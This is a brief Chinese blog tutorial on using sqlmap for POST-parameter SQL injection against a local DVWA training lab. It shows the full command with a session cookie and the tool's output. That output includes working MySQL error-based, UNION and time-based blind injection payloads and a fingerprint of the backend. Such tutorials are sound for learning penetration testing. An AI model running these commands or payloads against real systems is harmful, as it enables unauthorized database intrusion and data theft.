Sqlmap的POST注入

最新推荐文章于 2024-10-16 13:44:04 发布

v0dga

最新推荐文章于 2024-10-16 13:44:04 发布

阅读量8.8k

点赞数

分类专栏： SqlMap 文章标签： testing mysql query null session output

本文链接：https://blog.csdn.net/v0dga/article/details/7545066

版权

SqlMap 专栏收录该内容

1 篇文章 0 订阅

订阅专栏

最简单的是get注入。。。很多人刚用sqlmap不知道如何进行post注入，所以这里简单演示下。

F:\Pentest\software\测试软件\sqlmap>python sqlmap.py -u "http://192.168.1.204/dvwa/vulnerabilities/sqli/index.php?Submit=Submit#" --data "id=1" --cookie "security=low; PHPSESSID=2ct43q8u003g4fjm1o6jrjmbc7"
'svn' 不是内部或外部命令，也不是可运行的程序
或批处理文件。

    sqlmap/1.0-dev (r4826) - automatic SQL injection and database takeover tool
    http://www.sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 14:48:51

'stty' 不是内部或外部命令，也不是可运行的程序
或批处理文件。
[14:48:52] [INFO] using 'F:\Pentest\software\测试软件\sqlmap\output\192.168.1.204\session' as session file
[14:48:52] [INFO] testing connection to the target url
[14:48:52] [INFO] testing if the url is stable, wait a few seconds
[14:48:53] [INFO] url is stable
[14:48:53] [INFO] testing if POST parameter 'id' is dynamic
[14:48:53] [WARNING] POST parameter 'id' appears to be not dynamic
[14:48:53] [INFO] heuristics detected web page charset 'ascii'
[14:48:53] [INFO] heuristic test shows that POST parameter 'id' might be injectable (possible DBMS: MySQL)
[14:48:53] [INFO] testing sql injection on POST parameter 'id'
[14:48:53] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[14:48:54] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[14:48:54] [INFO] POST parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable 
[14:48:54] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[14:48:55] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[14:49:05] [INFO] POST parameter 'id' is 'MySQL > 5.0.11 AND time-based blind' injectable 
[14:49:05] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[14:49:05] [INFO] target url appears to be UNION injectable with 2 columns
[14:49:05] [INFO] POST parameter 'id' is 'MySQL UNION query (NULL) - 1 to 10 columns' injectable
POST parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 31 HTTP(s) requests:
---
Place: POST
Parameter: id
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=1' AND (SELECT 2782 FROM(SELECT COUNT(*),CONCAT(0x3a7a727a3a,(SELECT (CASE WHEN (2782=2782) THEN 1 ELSE 0 END)),0x3a7877753a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'KQLu'='KQLu

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=1' UNION ALL SELECT NULL, CONCAT(0x3a7a727a3a,0x4f584c50796c6c55696e,0x3a7877753a)# AND 'nemX'='nemX

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1' AND SLEEP(5) AND 'tLql'='tLql
---

[14:49:09] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.3.5, Apache 2.2.17
back-end DBMS: MySQL 5.0
[14:49:09] [INFO] Fetched data logged to text files under 'F:\Pentest\software\测试软件\sqlmap\output\192.168.1.204'

[*] shutting down at 14:49:09